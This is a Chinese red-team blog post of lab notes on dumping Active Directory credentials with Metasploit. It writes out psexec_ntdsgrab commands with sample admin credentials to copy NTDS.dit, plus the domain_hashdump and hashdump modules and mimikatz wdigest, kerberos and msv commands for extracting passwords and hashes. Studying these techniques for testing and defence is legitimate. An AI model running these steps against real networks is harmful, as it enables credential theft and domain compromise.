使用 Metasploit 获取哈希或域内哈希值

  • A+
所属分类:安全文章

渗透攻击红队

一个专注于红队攻击的公众号

使用 Metasploit 获取哈希或域内哈希值


大家好,这里是 渗透攻击红队 的第 35 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),不出意外每天一更



Metasploit

psexec_ntdsgrab 模块的使用


在 MSF 中使用 psexec_ntdsgrab 模块:

use auxiliary/admin/smb/psexec_ntdsgrabset rhosts 192.168.2.25set smbdomain god.orgset smbuser administratorset smbpass Admin12345

使用 Metasploit 获取哈希或域内哈希值

设置完后然后执行 exploit 运行(要运行两次,该脚本使用卷影拷贝服务):

使用 Metasploit 获取哈希或域内哈希值

可以通过SMB服务直接与域控制器进行身份验证,创建系统驱动的卷影复制,并将NTDS.DIT和SYSTEM hive的副本下载到Metasploit目录中。这些文件可以与impacket等其他工具一起使用,这些工具可用于执行活动目录密码哈希值的提取。ntds.dit 和 SYSTEM会放在 /root/.msf4/loot/ 文件夹下:

使用 Metasploit 获取哈希或域内哈希值

之后就可以使用 impacket 工具包等解析 ntds.dit文件,导出域账号和域散列值了。


Metasploit 会话获取域账号和哈希值


首先是使用 msf 反弹了一个域控的 shell:

使用 Metasploit 获取哈希或域内哈希值

然后使用 MSF 的后渗透模块:

use post/windows/gather/credentials/domain_hashdumpset session 2

使用 Metasploit 获取哈希或域内哈希值

然后运行 exploit :

使用 Metasploit 获取哈希或域内哈希值

但是利用失败了,我也不知道为啥。

还可以使用 hashdump 来导出用户 hash:

使用 Metasploit 获取哈希或域内哈希值

还可以通过 MSF 加载 mimikatz 来读取密码:

# 加载mimikazload mimikatz

使用 Metasploit 获取哈希或域内哈希值

# 抓取明文密码wdigest 

使用 Metasploit 获取哈希或域内哈希值

# 抓取明文密码kerberos

使用 Metasploit 获取哈希或域内哈希值

# 抓取加密后的ntlm、lm密码msv

使用 Metasploit 获取哈希或域内哈希值


使用 Metasploit 获取哈希或域内哈希值

渗透攻击红队

一个专注于渗透红队攻击的公众号

使用 Metasploit 获取哈希或域内哈希值



使用 Metasploit 获取哈希或域内哈希值
点分享
使用 Metasploit 获取哈希或域内哈希值
点点赞
使用 Metasploit 获取哈希或域内哈希值
点在看

本文始发于微信公众号(渗透攻击红队):使用 Metasploit 获取哈希或域内哈希值

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: